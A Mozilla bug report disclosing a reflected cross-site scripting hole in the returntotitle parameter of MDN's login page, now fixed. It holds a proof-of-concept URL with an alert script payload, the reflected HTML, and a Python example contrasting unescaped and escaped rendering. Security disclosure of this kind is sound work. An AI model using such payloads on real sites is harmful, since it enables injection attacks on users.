XSS vuln in 'returntotitle' parameter on Special:UserLogin page

VERIFIED FIXED

Status

--
critical
9 years ago
3 years ago

People

(Reporter: reed, Assigned: royk)

Tracking

({wsec-xss})

(Reporter)

Description

9 years ago
Found by hyperscan

https://developer.mozilla.org/index.php?title=Special:UserLogin&returntotitle="><script>alert('xss');</script>

	 		<div id="page-top"><div id="pageToc"><div class="pageToc"><h5>Table of contents</h5></div></div><div class="pageText" id="pageText"><div id="pageTypeSpecial"><form method="post" action="/Special:UserLogin" class="user-login"><fieldset><input type="hidden" value="1" name="auth_id" id="hidden-auth_id" autocomplete="off" /><div class="field"><label for="text-username">Username</label> <input type="text" value="" name="username" tabindex="1" size="24" spellcheck="false" class="input-text" id="text-username" autocomplete="off" /><div class="create-account"><a href="/Special:UserRegistration">Create an account</a></div></div><input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" /><div class="field"><label for="password-password">Password</label> <input type="password"  name="password" tabindex="2" size="24" spellcheck="false" class="input-password" id="password-password" autocomplete="off" /><div class="forgot-password"><a href="/Special:UserPassword">Forgot password?</a></div></div><button type="submit" name="deki_buttons[action][login]" value="login" tabindex="3" class="input-button"><span>Login</span></button></form></div></div></div><div class="printfooter" id="printfooter"><hr />

Specifically,

<input type="hidden" value=""><script>alert('xss');</script>" name="returntotitle" id="hidden-returntotitle" autocomplete="off" />
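The reflection shown in this report, reproduced as an added example (not code from the bug, the attached patch, or Deki itself): the same hidden input rendered with and without attribute-context escaping, then parsed to confirm what the browser would see. The function names `render_raw`, `render_escaped` and `parse_fragment` are hypothetical, and the payload is the one from the report's URL.

```python
from html import escape
from html.parser import HTMLParser

# Value of the returntotitle parameter, taken from the URL in the report.
PAYLOAD = "\"><script>alert('xss');</script>"

# Hypothetical template mirroring the hidden input quoted in the report.
TEMPLATE = ('<input type="hidden" value="%s" name="returntotitle" '
            'id="hidden-returntotitle" autocomplete="off" />')


def render_raw(value):
    """'Before' behaviour from the report: the value is interpolated unescaped."""
    return TEMPLATE % value


def render_escaped(value):
    """Hardened form: encode &, <, > and both quote characters for attribute context."""
    return TEMPLATE % escape(value, quote=True)


class TagCollector(HTMLParser):
    """Records each start tag and the decoded value of the returntotitle input."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.returnto_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "returntotitle":
            self.returnto_value = attrs.get("value")


def parse_fragment(fragment):
    """Return (start tags seen, value attribute of the returntotitle input)."""
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags, parser.returnto_value


if __name__ == "__main__":
    for render in (render_raw, render_escaped):
        print(render.__name__, parse_fragment(render(PAYLOAD)))
```

In the raw rendering the quote closes the `value` attribute early, so the parser sees a separate `script` element and the input never receives its `name`; in the escaped rendering there is a single `input` whose decoded value round-trips to the original string.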
(Reporter)

Comment 2

9 years ago
Attachment 389574 [details] [diff] includes a fix for this bug.
(Reporter)

Comment 3

9 years ago
Patch resolved the issue.
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED
(Reporter)

Updated

9 years ago
Assignee: nobody → royk
(Reporter)

Updated

9 years ago
Blocks: 505301
Verified FIXED.
Status: RESOLVED → VERIFIED
Component: Deki Infrastructure → Other
Product: Mozilla Developer Network → Mozilla Developer Network
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.
Group: websites-security